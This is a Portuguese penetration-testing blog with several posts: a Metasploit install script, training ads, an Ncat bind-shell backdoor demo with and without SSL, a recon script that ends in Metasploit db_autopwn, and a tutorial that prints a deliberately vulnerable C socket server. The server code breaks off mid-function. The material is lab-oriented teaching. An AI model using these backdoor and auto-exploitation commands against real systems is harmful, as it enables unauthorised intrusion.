CodeSec - How to?

[Shell-Script] Install Metasploit in Ubuntu for Beginner

2011-11-27T23:13:00.002-02:00

Devido receber vários e-mails perguntando como se instala (e quando digo vários, é vários meeeesmo :S) o metasploit no ubuntu, resolvi fazer rapidamente este script para tal fim.
É eu sei que o código tem bugs, mais ao que se propõe ele cumpre. :D
Testado nas versões 11.04 e 11.10.

#!/bin/bash

clear
echo
echo
echo "         ..:[ Install MSF ]:.."
echo
echo "        Roberto Soares (espreto)"
echo "        robertoespreto@gmail.com"
echo
echo
echo "[+] Install the Metasploit Framework on Ubuntu Linux now? y/n "; read whx
   if [ $whx = "y" ]
   then
      echo
      echo "[+] Installing the Ruby dependencies..."
      apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems 1> /dev/null 2> /dev/stdout
      echo "OK!"
      echo "[+] Installing the Subversion client..."
      apt-get install -y subversion 1> /dev/null 2> /dev/stdout
      echo "OK!"
      echo "[+] Installing extensions (pcaprub, lorcon2, etc)..."
      apt-get install -y build-essential ruby-dev libpcap-dev 1> /dev/null 2> /dev/stdout
      echo "OK!"
      echo "[+] Download framework..."
      echo
      wget -c http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
      echo "[+] Unpacking the file..."
      tar -jxvf framework-latest.tar.bz2 1> /dev/null 2> /dev/stdout
      mkdir -p /opt/metasploit
      cp -a msf/ /opt/metasploit/msf3
      chown root:root -R /opt/metasploit/msf3
      ln -sf /opt/metasploit/msf3/msf* /usr/local/bin/
      rm -rf msf/
      echo "OK!"
      echo
      echo "   CONGRATULATIONS! Install Metasploit Successful!!!"
   else
      echo     
      echo "Why?"
      echo "  You do not know what you're missing!"
      echo
      exit 0;
   fi
echo

echo "[+] Update now? y/n "; read whx
   if [ $whx = "y" ]
   then
      echo "   Wait..."
      msfupdate 1> /dev/null 2> /dev/stdout
      echo "   OK!"
   else
      echo "     Future use in the terminal: msfupdate"
   fi
echo
echo "[+] Install PostgreSQL Database now? y/n "; read whx
   if [ $whx = "y" ]
   then
      echo "   Wait..."
      apt-get install -y postgresql-8.4 rubygems libpq-dev 1> /dev/null 2> /dev/stdout
      gem install pg 1> /dev/null 2> /dev/stdout
      apt-get install -y libreadline-dev libssl-dev libpq5 ruby-dev 1> /dev/null 2> /dev/stdout
      echo "   OK!"
      echo
      echo "1º Choice a username (user for connect in database):" ; read username
      sudo -u postgres createuser -D -A -P $username
      echo "   Done!"
      echo
      echo "2º Choice a database name (that will be used by msf):" ; read db_name
      sudo -u postgres createdb -O $username $db_name
      echo "   Done!"
      echo
      echo "        Connect to the postgreSQL database in msfconsole using:"
      echo "             msf> db_driver postgresql"
      echo "             msf> db_connect $username:password@127.0.0.1/$db_name"
      echo "             msf> db_status"
      echo
      sleep 8
   fi
clear
echo
echo "     Installation Complete!"
echo "  In terminal, run: msfconsole"
echo
echo
echo "         Good bye!"
echo
# end script

:wq!

Hack Training - Demo aula sobre Pivoting

2011-11-21T05:02:00.000-02:00

Olá pessoal!

Segue uma pequena demonstração de uma aula ministrada alguns dias atrás, resolvi disponibilizar aqui para que conheçam um pouco mais da infraestrutura do treinamento.

Realizei apenas a gravação da parte "Desktop Sharing", onde é visualizado em tempo real as atividades que o instrutor está realizando. Ainda temos o recurso de chat, imagem de exibição do instrutor, perguntas e respostas através de pop-ups, etc.

Veja abaixo o vídeo.

No dia 23/11 (quarta-feira) colocarei um novo vídeo aqui no blog falando sobre backdoor, fiquem atentos.

Se interessou pelo treinamento? Acesse: www.hacktraining.com.br/msf e inscreva-se.

Att,

Metasploit Community Edition - Instalation

2011-11-09T17:32:00.000-02:00

puts "Hello people!"

O que é Metasploit Community Edition?

Veja segundo o próprio site:

"If you are trying to learn about Metasploit and penetration testing, Metasploit Community Edition is your best option. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose - for free. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. IT professionals can demonstrate the impact of vulnerabilities to IT operations to obtain buy-in for remediation."

Fonte: http://metasploit.com/about/choose-right-edition/

A partir desde post, irei relatar algumas particularidades de uso do recente framework lançado pela Rapid7, o "Metasploit Community Edition". Como seu lançamento ocorreu a pouquíssimo tempo, ainda não há documentação (eu acho, existe?) em português sobre o mesmo. Nesta série de 5 posts, iremos abordar os seguintes tópicos:

Instalation
Network Discovery
Vulnerability Scanner Import
Basic Exploitation
Module Browser

Onde estarei utilizando a distribuição BackTrack 5 R1 para efetuar os "ataques" e também configurei algumas máquinas virtuais para sofrerem os ataques, o software de virtualização utilizado foi o VMWare Player.

Requisitos para seguir este post:

VMWare Player; http://www.vmware.com/products/player/
BackTrack 5 R1; http://www.backtrack-linux.org/downloads/
Metasploit Community Edition; http://metasploit.com/download/

Let's Go!!!

Em sua máquina com o BackTrack, acesse o site do Metasploit e efetue o download da versão "Community Edition".

Ao término do download, dê permissão de execução ao arquivo. Abra uma shell e digite:

Agora execute o arquivo (não vá matar o arquivo com um tiro ok? :P) com o comando "./metasploit-latest-linux-installer.run" (sem aspas) conforme figura abaixo.

As etapas de instalação se inciará assim que você clicar em "Forward".

Aqui você precisa aceitar os termos de lincensa e clicar em "Forward".

Selecione o diretório onde será realizada a instalação. Não existe a necessidade de alterar nada a princípio, deixe como está e clique em "Forward".

Aqui ele pergunta se você deseja instalar o metasploit como um serviço, ou seja, toda vez que a máquina for ligado/reiniciada automaticamente será iniciado o metasploit deixando-o pronto para uso. Selecione "Yes" e clique em "Forward".

Lhe pergunta qual a porta que será utilizada, deixe a padrão 3790 e clique em "Forward".

Aqui ele pede para você inserir o nome de sua maquina para atender através de um domínio e os dias de validade de seu certificado. Você pode deixar com os valores padrões que aparecer e clicar em "Forward".

Se você deseja realizar atualizações automaticamente, deixe como "Yes" e pressione "Forward".

A mensagem diz que o Metasploit começará o processo de instalação em seu computador. Clique em "Forward".

Abaixo a instalação está em andamento.

Clique em "Finish" para finalizar a instalação (óbvio não?).

Um erro sobre certificado pode ser apresentado, clique em "Continue".

Se você utilizar o FireFox no BackTrack, ao inserir a URL para acessar a interface web do metasploit, será apresentada um erro de certificado, conforme figura abaixo.

Precisaremos adicionar um excessão, clique em "Add Exception".

Na nova janela que abri, clique em "Confirm Security Exception".

E abrirá normalmente a tela de login do Metasploit. Agora basta cadastrarmos um usuário e senha para acessarmos o ambiente.

Como estamos utilizando BackTrack, você precisará aceitar este aceite dando permissão ao NoScript que vem instalado por padrão no FireFox/BackTrack. Clique "Options" na parte inferior direita do desktop e depois em "Allow https://localhost".

Preencha as informações necessárias e depois em "Create Account".

ERROS: O possível erro que pode ocasionar nesta etapa é a criação da senha, você precisará especificar uma senha contendo 8 dígitos, entre eles deve haver, letras maiúsculas e minusculas, caracteres especiais e número, exemplo, RoB3r7@0!.

Será lhe apresenta a tela para a ativação do software.

Clique no link "Register your Metasploit license here!", você será redirecionado a uma nova página.

Ao lado inferior esquerdo, referente ao Metasploit Community, basta pressionar "Go" se foi preenchido corretamente o mesmo e-mail cadastrado anteriormente.

Verifique seu e-mail, copie o serial e cole na página abaixo, pressionando "Next", você será redirecionado novamente a tela de ativação do Metasploit.

Falto pouco, calma! Agora clique em "Activate License" e...

...VOILÀ! Metasploit Community Edition ativado com sucesso, prontinho para ser utilizado. :D

A instalação será a parte mais fácil se comparado com as próximas partes que escrevei.
Bom, qualquer dúvida durante a instalação, deixe seu comentário aqui mesmo no blog ou envie um e-mail para espreto@hacktraining.com.br que terei o prazer em ajudar a sanar as possíveis dúvidas.

Até a próxima pessoal!
:wq!

NCAT com SSL

2011-11-04T06:19:00.003-02:00

Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria das suas funcionalidades se assemelham se comparadas. Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do ncat é a transferência de dados entre dois hosts (linux <--> linux, windows <--> windows ou linux <--> windows) de forma simplificada. Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet. Imagine isso para um backdoor simples heim?

Onde:

192.168.0.125 é o IP do atacante. (BackTrack)
192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando: ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125

E na máquina do atacante digite: ncat -v 192.168.0.147 1337

Com SSL

No alvo digite o comando: ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125

E na máquina do atacante digite: ncat -v --ssl 192.168.0.147 1337

Agora utilize o wireshark com apenas o filtro "tcp", em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help

Links:

Ncat

http://nmap.org/ncat/

Wireshark

http://www.wireshark.org/

:wq!

Palestra - "Metasploit Framework"

2011-10-29T00:54:00.000-02:00

Depois de muito tempo, devido a falta de tempo realmente, aqui estou novamente de volta o meu blog, isso devido a minha nova "rotina" de vida, dividindo bem os horários pra sobrar tempo pra tudo e pra todos. Alguém ai disse que está com saudades de mim? Ah, dúvido! :P

Pois bem, anteontem (27/10/2011) estive presente palestrando sobre o framework "Metasploit" e suas features no evento SEINFO (Semana de Sistemas da Informação), que está em sua 4ª edição organizado pela UNIESP (http://www.uniesp.edu.br/prudente/) da cidade de Presidente Prudente aqui do estado de São Paulo pra quem não conhece. :)

Segue abaixo o slide utilizado.

Slide Palestra "Metasploit Framework"

View more presentations from Roberto Soares (espreto)

E segue também um vídeo de qualidade "duvidosa" abaixo. :P

Obrigado e até o próximo post.

Att,

Treinamento Metasploit Exploitation - Versão EaD

2011-04-25T20:47:00.004-03:00

Treinamento

Metasploit Exploitation (EaD)

Abril 2011

Metasploit é um verdadeiro canivete suíço presente no arsenal de um penetration tester. É um framework com muitas capacidades diferentes e espetaculares.

A comunidade em geral (usuários, desenvolvedores, hackers, etc...) contribui em peso em seu desenvolvimento e manutenção. Além do vasto número de exploits já incorporados em sua base e atualizados diariamente. O framework pode ser utilizado para o desenvolvimento de novos exploits, fuzzing e o que sua imaginação permitir. Muitos profissionais de segurança não conhecem os recursos avançados que o framework oferece, em que o uso facilita muito em determinados testes.

Este curso visa proporcionar um conhecimento aprofundado de vários recursos presentes no framework que devem ser usados em um teste de intrusão ou em uma análise de vulnerabilidades com maior eficácia. O curso tem ênfase na prática, ou seja, mãos na massa, mas a teoria não será deixada de lado, além de saber explorar, você também entenderá de maneira fácil, o que está fazendo.

Os participantes passarão a ter uma compreensão melhor, não apenas dos aspectos técnicos de segurança, mas também experiência prática essencial, bem como aprender a aplicar corretamente o conhecimento adquirido de forma ética.

Diferencial:

Conhecimento aprofundado através de exercícios práticos em características pouco exploradas, mas extremamente úteis para um penetration tester presentes no framework.

Estudos de problemas que possam aparecer ao utilizar determinadas particularidades do framework para que se possa obter uma melhor qualidade nos resultados.

Com um laboratório especialmente criado próximo do real, utilizaremos o conhecimento obtido durante o curso e aplicamos em nosso alvo. Os participantes terão que procurar as falhas, explorá-las, usar o raciocínio lógico para desvendar alguns desafios e documentar os resultados de uma forma abrangente.

Ementa:

Creating Lab for Testings.
Introduction Metasploit.
Recon and Scanning with Metasploit.
Exercise: Finding vulnerabilities in Hack Training Lab.
Import Nessus/OpenVAS and Nmap scans.
db_autopwn.
Enumeration Services.
DNS/SSH Tunneling.
Exercise: Attacking Machines Windows.
Meterpreter.
Dissecting with Wireshark and Tcpdump.
Dumping Password Hashes.
Pass-the-hash with Metasploit.
Sniffing.
Advanced Exploits and Payload options.
Evasion Techniques.
Exercise: Attacking W2k Server.

Client-Side Exploitation.
Bypassing Anti-Virus with Metasploit.
Creating .exe, .vbs e Java Payloads.
Encoding Payloads.
Exercise: Bypassing Anti-Virus.
Working with Meterpreter Scripts.
Smb_relay.
Backdoors.
Advanced Pivoting.
Internals Commands Windows.
Exercise: Exploration others internal machines in Hack Training Lab.
Timestomp.
SQLMap Integration.
Exercise: Attacking Databases.
The Social Engineering Toolkit (SET).
Browser AutoPwn.
Metasploit Pro.
Armitage.
Exercise: Attacking Linux.
Capture the Flag.

Requisitos Mínimos:

Leitura básica em Inglês Técnico;
Conhecimentos básicos em redes de computadores (TCP/IP);
Conhecimentos básicos em linha de comando do Linux/Windows;
Conhecimentos mínimos no Framework Metasploit.
Graduandos em computação;
Pesquisadores;
Penetration Tester que queiram melhorar seus conhecimentos no framework;
Entusiastas em segurança;
Etc…

Infra-estrutura oferecida:

Apostila [PDF];
DVD com Backtrack 4 R2;
DVD com Distribuição Vulnerável para Testes;
Acesso Remoto ao Hack Training Lab via VPN;*
Certificado de Conclusão;
Camiseta;

*No primeiro dia de treinamento, será disponibilizado a chave de acesso para cada participante autenticar no laboratório remoto através de uma VPN. O laboratório funcionará em regime 24/7, se houver à necessidade de parada para manutenção, cada participante será avisado com alguma antecedência através de e-mail, com especificação da data de parada e previsão de retorno. Também será disponibilizado, em horário comercial, um contato via mensageiro instantâneo para problemas de conexão ao laboratório. O lab ficará disponível ao aluno somente durante o período de treinamento.

Laboratório utilizado no treinamento:

Carga horária:

Horário A:

24 horas de treinamento.

As Segundas, Terças e Quintas das 19hs as 22hs. (8 dias).

Horário B:

24 horas de treinamento.

Aos Sábados das 08hs as 15hs. (4 Sábados).

Horário C:

24 horas de treinamento.

As Segundas, Terças e Quintas das 08hs as 11hs. (8 dias).

Valor:

R$460,00 (Quatrocentos e sessenta reais).

Formas de pagamento:

Através do PAGSeguro UOL (Até 10x) ou Depósito em conta bancária. À vista 10% de desconto.

Local:

EaD (Ensino à Distância.)

Requisitos de Conexão:

Para o bom proveito do treinamento, aconselhamos uma configuração mínima conforme descrita abaixo:

Conexão banda larga mínima de 512KB;
Navegador: Firefox, Chrome, Safari ou Internet Explorer;
Fone de ouvido com microfone.

Contato:

Para os interessados, enviar um e-mail para o seguinte endereço:

training@hacktraining.com.br

Com as seguintes especificações:

Nome:

E-mail:

Telefone:

Como deseja que a Hack Training entre em contato? ( ) E-mail ( ) Telefone

Mensagem:

Hack Training

Hack Training - Offensive Safety

Metasploit Training Providers

CodeSec - How to? - [Post] Hack Training - Metasploit Training Providers

Follow @hacktraining

Att,

Hack Training - Metasploit Training Providers

2011-04-01T10:46:00.000-03:00

Após um bom tempo de conversa com o pessoal da rapid7, diga-se de passagem, extremamente atenciosos, e com o lançamento do novo layout do site metasploit.com, foi adicionado a seção "Metasploit Training Providers" onde temos o orgulho de estar representando o Brasil com a Hack Training, podendo oferecer treinamentos sobre o metasploit framework e metasploit Pro, com qualidade e profissionais altamente qualificados.

Estamos realizando um upgrade em nossa infraestrutura para proporcionar um ambiente próximo ao real para que o participante possa além de aprender a trabalhar com o framework, também possa adquirir experiência necessária para desenvolver um bom trabalho. A Hack Training, atualmente conta com 18 computadores, que consistem de servidores dedicados, estações de trabalho, laptops, bem como dispositivos portáteis rodando sob um certo número de plataformas.

Para visualizar o conteúdo abordado, por favor, acessem o link abaixo:

Metasploit Exploitation

Obs.: O conteúdo está sobre constante reformulação, para proporcionar o que está sendo utilizado pelos profissionais de segurança da informação atualmente.

Se deseja um treinamento em sua cidade e/ou empresa, contate-nos.

Contato: espreto@hacktraining.com.br

Links:

Rapid7
Metasploit
Metasploit Training Providers
Hack Training

Att,

Slides - Andradina/SP

2011-03-19T14:47:00.000-03:00

Uns colegas pediram para ver novamente a apresentação que realizei na faculdade de Andradina e o slide de um curso sobre Metasploit que realizei ano passado.

Slide Palestra:

Current Threads, White/Black Hats and Practice

View more presentations from Roberto Soares (espreto)

Slide curso metasploit

View more presentations from Roberto Soares (espreto)

Em breve postarei os slides das paletras e treinamentos mais recentes.

Att,

Treinamento Metasploit Exploitation

2011-01-20T17:51:00.003-02:00

Treinamento

Metasploit Exploitation

(update - 08/04/2011)

Abril 2011

Metasploit é um verdadeiro canivete suíço presente no arsenal de um penetration tester. É um framework com muitas capacidades diferentes e espetaculares.

O número de alunos será limitado a 10 participantes, a fim de assegurar um aprendizado eficaz.

Diferencial:

Conhecimento aprofundado através de exercícios práticos em características pouco exploradas, mas extremamente úteis para um penetration tester presentes no framework.

Estudos de problemas que possam aparecer ao utilizar determinadas particularidades do framework para que se possa obter uma melhor qualidade nos resultados.

Com um laboratório especialmente criado próximo do real, utilizaremos o conhecimento obtido durante o curso e aplicamos em nosso alvo. Os participantes terão que procurar as falhas, explorá-las, usar o raciocínio lógico para desvendar alguns desafios e documentar os resultados de uma forma abrangente.

Ementa:

Metasploit 0x100 – Dia 1

Discutir os aspectos introdutórios de como realizar testes de intrusão, a necessidade de testes regularmente, como estruturar, planejar e não perder o foco.

Realizar exercícios práticos em nosso ambiente virtual, com exploração aos recursos básicos e principais presentes no framework metasploit a fim de nivelar o conhecimento de todos os participantes. Avaliar o laboratório a procura de vulnerabilidades e analisar os resultados cuidadosamente para diminuir os falsos positivos, e assim realizar um teste mais eficaz.

Dissecar a rede com o uso de sniffers para visualizar o tráfego gerado no momento da exploração.

Realizar a exploração de uma máquina Windows, já que a mesma detém boa fatia do mercado de sistemas operacionais.

Usar os recursos avançados de exploits e payloads, e discutir como minimizar os erros que possam aparecer durante a execução de exploits em nosso alvo.

Seguem os tópicos abordados:

Creating Lab for Testings.
Introduction Metasploit.
Recon and Scanning with Metasploit.
Exercise: Finding vulnerabilities in Hack Training Lab.
Import Nessus/OpenVAS and Nmap scans.
db_autopwn.
Enumeration Services.
DNS/SSH Tunneling.
Exercise: Attacking Machines Windows.
Meterpreter.
Dissecting with Wireshark and Tcpdump.
Dumping Password Hashes.
Pass-the-hash with Metasploit.
Sniffing.
Advanced Exploits and Payload options.
Evasion Techniques.
Exercise: Attacking W2k Server.

Metasploit 0x200 – Dia 2

Abordar recursos mais avançados presentes no framework. Técnicas para se burlar anti-virus. Criar payloads customizados. Realizar uma profunda abordagem sobre a pós-exploração de um alvo, ou seja, o que fazer após ganhar uma shell meterpreter, como continuar explorando outras máquinas na rede interna, realizar a escalada de privilégios local tanto em ambiente Windows quanto em ambiente linux. Utilizar toda a capacidade que o meterpreter proporciona e também criar nossos próprios scripts. Explorar comandos desconhecidos do ambiente Windows e levantar o maior número possível de informações presentes, já que nem sempre é possível ter uma Shell meterpreter disponível. Tentar dificultar o trabalho da perícia forense encobrindo rastros dentro do sistema comprometido. Analisar a exploração de servidores de banco de dados e injetar comandos para que nos sejam retornados informações preciosas, dando-nos a possibilidade de acesso total ao servidor. Conhecer algumas ferramentas que se integram ao metasploit e que também possam ajudar no processo de intrusão. Seguem os tópicos abordados:

Client-Side Exploitation.
Bypassing Anti-Virus with Metasploit.
Creating .exe, .vbs e Java Payloads.
Encoding Payloads.
Exercise: Bypassing Anti-Virus.
Working with Meterpreter Scripts.
Smb_relay.
Backdoors.
Advanced Pivoting.
Internals Commands Windows.
Exercise: Exploration others internal machines in Hack Training Lab.
Timestomp.
SQLMap Integration.
Exercise: Attacking Databases.
The Social Engineering Toolkit (SET).
Browser AutoPwn.
Introduction Metasploit Pro.
Armitage.
Exercise: Attacking Linux.

Metasploit 0x300 – Dia 3

Avaliação prática e escrita:

Prática - Os participantes demonstrarão todo conhecimento adquirido no curso em uma infra-estrutura virtual criada especialmente para o Capture the Flag, para consolidação dos conhecimentos sobre o framework Metasploit.

Escrita - Registro de todo o processo de busca a pontos de vunerabilidade.

Segue tópico abordado:

Capture the Flag.

Requisitos Mínimos:

Conhecimento em redes de computadores (TCP/IP), conhecimentos em linha de comando do linux/windows e base mínima no framework Metasploit.
Graduandos em computação;
Pesquisadores;
Penetration Tester que queiram melhorar seus conhecimentos no framework;
Entusiastas em segurança;
Etc…

Infra-estrutura oferecida:

Apostila;
DVD com Backtrack 4 R2;
DVD com distribuição vulnerável para testes;
*30 dias de acesso remoto ao Hack Training Lab via VPN;
Certificado de conclusão;
Camiseta;
Coffee-Break;

Laboratório utilizado no treinamento:

Carga horária:

Treinamento + CTF = 20 horas de treinamento.

Valor:

R$820,00 (Oitocentos e vinte reais).

Formas de pagamento:

Através do PAGSeguro UOL ou Depósito em conta bancária.

Local:

DoMore!

Avenida Paulista, 807, 18º andar – São Paulo – SP.

Dia a ser definido quando completar a turma.

Contato:

Para os interessados, enviar um e-mail para o seguinte endereço:

training@hacktraining.com.br

Ou adicionar o endereço abaixo em seu mensageiro instantâneo (MSN, aMSN, Pidgin, Gaim, etc…)

contato@hacktraining.com.br

Referência no Brasil: www.metasploit.com

Em breve na versão EaD. Aguardem!

Att,

Script Enumeration and Scanning with Matriux "Xenon"

2010-12-14T09:15:00.003-02:00

Bom, devido a ociosidade de ontem à noite, resolvi criar este script simples para enumeração e scanning de serviços para ser utilizado com a distribuição Matriux. As ferramentas presentes no script já existem, apenas fiz um "amontoado" delas, alguns resultados são interessantes de serem analisados.

Segue o source do script.

#!/bin/bash

clear
echo
echo "---->> Enumeration and Scanning <<----"
echo
echo "Roberto Soares (espreto)"
echo "MATRIUX V0.2 - 14/12/2010"
echo "Suggestions? robertoespreto@gmail.com"
echo "Edited on 16/12/2010 by L30"
echo
mkdir /home/tiger/Desktop/Matriuxenum/
echo "Generating Directory /home/tiger/Desktop/Matriuxenum/ "
echo "Usage: domain.com.br and/or domain.com..."
echo "Enter with the domain:"
echo
read dominio
echo
echo [+] "Perform Whois scan? y/n "; read whx
if [ $whx = "y" ]
then
echo "####################################################"
echo
echo [+] "whois" $dominio
echo
whois $dominio >> /home/tiger/Desktop/Matriuxenum/whois.txt
cat /home/tiger/Desktop/Matriuxenum/whois.txt
echo
echo "whois completed on domain $dominio"
fi
echo
echo [+] "Perform dig? y/n" ; read digx
if [ $digx = "y" ]
then
echo "####################################################"
echo
echo [+] "dig" $dominio "any"
echo
echo
dig $dominio any >> /home/tiger/Desktop/Matriuxenum/dig.txt
cat /home/tiger/Desktop/Matriuxenum/dig.txt
echo
echo "dig completed on $dominio"
fi
echo
echo [+] "Perform TCPTraceroute? y/n" ; read tcpx
if [ $tcpx = "y" ]
then
echo "####################################################"
echo
echo [+] "tcptraceroute -i eth0" $dominio
echo
echo
tcptraceroute -i eth0 $dominio >> /home/tiger/Desktop/Matriuxenum/tcptrac.txt
cat /home/tiger/Desktop/Matriuxenum/tcptrac.txt
echo
echo "TCP traceroute completed on $dominio"
fi
echo
echo "#####################################################"
echo
echo "Scan with DNS tracer? y/n" ; read dnstx
if [ $dnstx = "y" ]
then
echo
echo [+] "dnstracer" $dominio
echo
echo
dnstracer $dominio >> /home/tiger/Desktop/Matriuxenum/dnstrac.txt
cat /home/tiger/Desktop/Matriuxenum/dnstrac.txt
echo
echo "DNSTRACE on $dominio completed"
fi
echo
echo "#######################################################"
echo
echo "Scan with DMitry? y/n" ; read dmitx
if [ $dmitx = "y" ]
then
echo
echo [+] "dmitry -s -e" $dominio
echo
echo
sudo dmitry -s -e $dominio >> /home/tiger/Desktop/Matriuxenum/dmit.txt
cat /home/tiger/Desktop/Matriuxenum/dmit.txt
echo
echo "Dmitry scan on $dominio completed"
fi
echo
echo "######################################################"
echo
echo "Perform DNSenum scan? y/n" ; read dnsenx
if [ $dnsenx = "y" ]
then
echo
echo [+] "perl dnsenum.pl --enum" $dominio
echo
cd /pentest/enumeration/dnsenum/
sudo perl dnsenum.pl --enum $dominio >> /home/tiger/Desktop/Matriuxenum/dnsenm.txt
cat /home/tiger/Desktop/Matriuxenum/dnsenm.txt
echo
echo "DNSenum completed on $dominio"
fi
echo
echo
echo "#####################################################"
echo
echo [+] "nmap -v --source-port 53 -sS --send-ip -n -PN -p- -f -sV --version-all -O --script=discovery -oX target_scan" $dominio
echo
cd /home/tiger/Desktop/
nmap -v --source-port 53 -sS --send-ip -n -PN -p- -f -sV --version-all -O --script=discovery -oX target_scan $dominio
echo
echo "#####################################################"
echo
echo "Scan with Nikto? y/n" ; read nikx
if [ $nikx = "y" ]
then
echo
echo [+] "nikto -update"
echo [+] "nikto -host" $dominio
echo
echo
nikto -update
nikto -host $dominio
echo
echo "Nikto completed on $dominio"
fi
echo
echo "######################################################"
echo
echo [+] "./skipfish -o /home/tiger/Desktop/output_file -W dictionaries/complete.wl http://www."$dominio
echo
echo
cd /pentest/scanners/skipfish/
sudo xterm -fg green2 -bg black -e "sudo ./skipfish -o /home/tiger/Desktop/output_file -W dictionaries/complete.wl http://www.$dominio"
echo
echo -n '[+] Want to see the log generated by skipfish now? y/n ' ; read resposta
if [ $resposta = "y" ] ; then
    firefox /home/tiger/Desktop/output_file/index.html

echo
echo -n '[+] Want to import the output of nmap with the db_autopwn metasploit? y/n ' ; read resposta_msf
     if [ $resposta_msf = "y" ] ; then
        echo "db_driver sqlite3" >> /home/tiger/Desktop/autopwn_msf
        echo "db_connect ./home/tiger/Desktop/owned.db" >> /home/tiger/Desktop/autopwn_msf
        echo "db_import_nmap_xml /home/tiger/Desktop/target_scan.xml" >> /home/tiger/Desktop/autopwn_msf
        echo "db_hosts" >> /home/tiger/Desktop/autopwn_msf
        echo "db_services" >> /home/tiger/Desktop/autopwn_msf
        echo "db_autopwn -p -t -e " >> /home/tiger/Desktop/autopwn_msf
        msfconsole -r /home/tiger/Desktop/autopwn_msf
         fi
fi
echo
echo "######################################################"
echo
echo "..: Enumeration and Scanning Complete! :.."
echo

Agora basta deixá-lo executável com o comando:

$ sudo chmod +x MATRIUXv2

e Logo após executá-lo:

$ sudo ./MATRiUXv2

Basta ler a saida dos comandos e analisá-los. :)

Obs. 01: Podem baixar através do pastebin no link abaixo:

http://pastebin.com/pmZDAvc9

Obs. 02: O script é um pouco demorado, então pode ir tomar café e relaxar um pouco! :)

UPDATE:

Realizado algumas correções por L30. (Variaveis e logs)

Att,

RTL8191SE no Backtrack 4 R1

2010-11-04T09:45:00.006-02:00

Recentemente ganhei um notebook da Sim+ modelo 6175 com processador i3 com 2GB de memória RAM, 320GB de HD, etc... Excelente desempenho por sinal! Logo de cara, fui colocar o livedvd do backtrack pra rodar e não reconheceu a placa wireless, sendo assim, fui pesquisar e consegui resolver. Segue abaixo uma breve explicação de como proceder para instalar esta placa no backtrack. A mesma dica serve para outras distribuições semelhantes!

Primeiramente você pode acessar o próprio site da realtek e baixar o driver.

www.realtek.com.tw

Ou, simplesmente clicar no link abaixo:

ftp://WebUser:Ds8MtJ3@202.134.71.22/cn/wlan/rtl8192se_linux_2.6.0018.1013.2010.tar.gz

Após o termino do download, basta descompactar o arquivo:

# tar -vzxf rtl8192se_linux_2.6.0018.1013.2010.tar.gz

Entre no diretório recém criado e dê o seguinte comando:

# make; make install; reboot

Ok, após o notebook reiniciar, sua placa wireless já estará funcionando, bastando apenas pressionar simultaneamente as teclas Fn + F11 para ativar/desativar.

Simples assim! :)

Obs.: Leia o README, pois lá contém outras informações importantes. :)

Ah, outra dica!
A primeira vez que for acessar a interface gráfica com o comando "startx", poderá aparecer um erro e não levantar o X, para isso dê o comando "fixvesa" e depois novamente o comando "startx", pronto!

Abraços!

Introduçao ao Metasploit - Parte 01

2010-09-25T09:45:00.051-03:00

Você pode baixar o pdf deste artigo em:

www.exploit-db.com

ou

www.shell-storm.org

--------

Mais um artigo sobre a utilização do framework Metasploit, vamos ver alguns passos básicos, como a exploração de um software vulneravel, criação de um backdoor, realizar o dump da memória RAM do alvo, verificar as possiveis conversas realizados pelo aplicativo Skype, entre outros. Let`s go!

Requisitos

Para este artigo, utilizei o seguinte ambiente e softwares:

1 - Backtrack 4 R1 instalado no HD (Hard Disc).
-----> Não ensinarei como instalar o Backtrack no HD, espero que você saiba, caso não, veja mais em Backtrack Hard Drive Install e para baixar a última versão do Backtrack, basta acessar este link e fazer o download:

BackTrack 4 R1 Release ISO
http://www.backtrack-linux.org/downloads/

2 - Virtualbox - Máquina virtual com Windows XP SP3.
-----> Já existe vários artigos aqui mesmo no VoL para a instalação do Virtualbox no linux, mais segue um passo-a-passo super rápido para instalar.

Abra um shell e digite:

root@bt:~# wget -c http://download.virtualbox.org/virtualbox/3.2.8/VirtualBox-3.2.8-64453-Linux_x86.run

Após o download, dê a permissão de execução:

root@bt:~# chmod +x Virtualbox-3.2.8-64453-Linux_x86.run

Em seguida, basta executá-lo:

root@bt:~# ./Virtualbox-3.2.8-64453-Linux_x86.run

Digite "yes" todas as vezes que lhe for perguntado. Pronto, seu virtualbox já está instalado. Foi criado um atalho em:

Menu Dragon --> System --> Oracle VM VirtualBox - Virtual Machine

Resta apenas criar a máquina virtual com o Windows XP, na qual não explicarei neste artigo.

3 - Software Skypeex.
-----> Para baixar esta ferramenta, basta visitar o link abaixo e fazer o download. Explicarei nos próximos capitulos a sua utilização, não sejam apressados.

Link: http://csitraining.co.uk/skypex.aspx

4 - Programa vulneravel em linguagem C, compile em seu Windows e o execute. Segue o código:

http://pastebin.com/raw.php?i=YhgSK5q2

#include
#include
#include

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}

int main(int argc, char **argv)
{

WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

